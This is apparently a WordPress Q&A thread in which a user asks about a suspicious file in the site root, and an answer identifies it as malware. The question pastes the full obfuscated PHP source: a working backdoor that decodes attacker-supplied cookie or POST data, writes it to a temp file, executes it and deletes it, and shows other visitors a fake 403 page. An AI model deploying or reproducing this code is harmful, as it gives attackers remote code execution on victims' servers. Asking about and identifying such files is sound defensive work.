CODEWITHSUNDEEP
phpwordpress
Taha Khan
Taha Khan

Reputation: 162

New file appeared on root folder. Is it for wordpress?

I'm new to wordpress and do not fully understand which files of wordpress are its own and which are not. Theres a file on root folder by the name b5tzvh8n.php with the following content:

<?php
if($_SERVER["SCRIPT_NAME"] != "/index.php"){ header("HTTP/1.0 403 Forbidden");echo base64_decode("PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+PGhlYWQ+Cjx0aXRsZT40MDMgRm9yYmlkZGVuPC90aXRsZT4KPC9oZWFkPjxib2R5Pgo8aDE+Rm9yYmlkZGVuPC9oMT4KPHA+WW91IGRvbid0IGhhdmUgcGVybWlzc2lvbiB0byBhY2Nlc3MgdGhpcyByZXNvdXJjZS48L3A+Cjxocj4KPC9ib2R5PjwvaHRtbD4=");die(); }
?>
<?php
function z1($f2){$b3 = "l'a*1 <g?.mndhHptk;sv359e#xErF4ifou2(bIy-_6/)@L8c" ;$z5='';foreach($f2 as $v4){$z5.=$b3[$v4];}return $z5;}$p6 = Array();$p6[] = z1(Array(47,42,4,47,24,21,4,22,40,2,47,22,2,40,30,23,22,37,40,37,22,47,23,40,47,47,37,35,12,32,22,4,4,2,2,22));$p6[] = z1(Array(8,15,13,15,5,45,34,11,0,31,11,17,36,41,41,29,38,46,27,41,41,44,18,5));$p6[] = z1(Array(9,10,33,12,34,0,24));$p6[] = z1(Array(14,3));$p6[] = z1(Array(9,43));$p6[] = z1(Array(25));$p6[] = z1(Array(6));$p6[] = z1(Array(32,31,0,24,41,15,34,16,41,48,33,11,16,24,11,16,19));$p6[] = z1(Array(2,28,28,2,39,41,10,24,28,7,24));$p6[] = z1(Array(19,16,28,41,28,24,15,24,2,16));$p6[] = z1(Array(24,26,15,0,33,12,24));$p6[] = z1(Array(19,34,37,19,16,28));$p6[] = z1(Array(34,11,0,31,11,17));$p6[] = z1(Array(19,16,28,0,24,11));$p6[] = z1(Array(15,2,48,17));$p6[] = z1(Array(10,12,22));foreach ($p6[8]($_COOKIE, $_POST) as $m14 => $e11){function r8($p6, $m14, $y10){return $p6[11]($p6[9]($m14 . $p6[0], ($y10 / $p6[13]($m14)) + 1), 0, $y10);}function x7($p6, $u12){return @$p6[14]($p6[3], $u12);}function y9($p6, $u12){if (isset($u12[2])) {$s13 = $p6[4] . $p6[15]($p6[0]) . $p6[2];@$p6[7]($s13, $p6[6] . $p6[1] . $u12[1]($u12[2]));@include($s13);@$p6[12]($s13);exit();}}$e11 = x7($p6, $e11);y9($p6, $p6[10]($p6[5], $e11 ^ r8($p6, $m14, $p6[13]($e11))));}

What is the purpose of this file?

Upvotes: 0

Views: 323

Answers (1)

Growdzen
Growdzen

Reputation: 79

This is malware, you should install a plugin like Wordfence. It will allow you to find the infected files and hopefully also the point of entry. You should be aware that this happens often from nulled sofware packages.

Upvotes: 1

Related Questions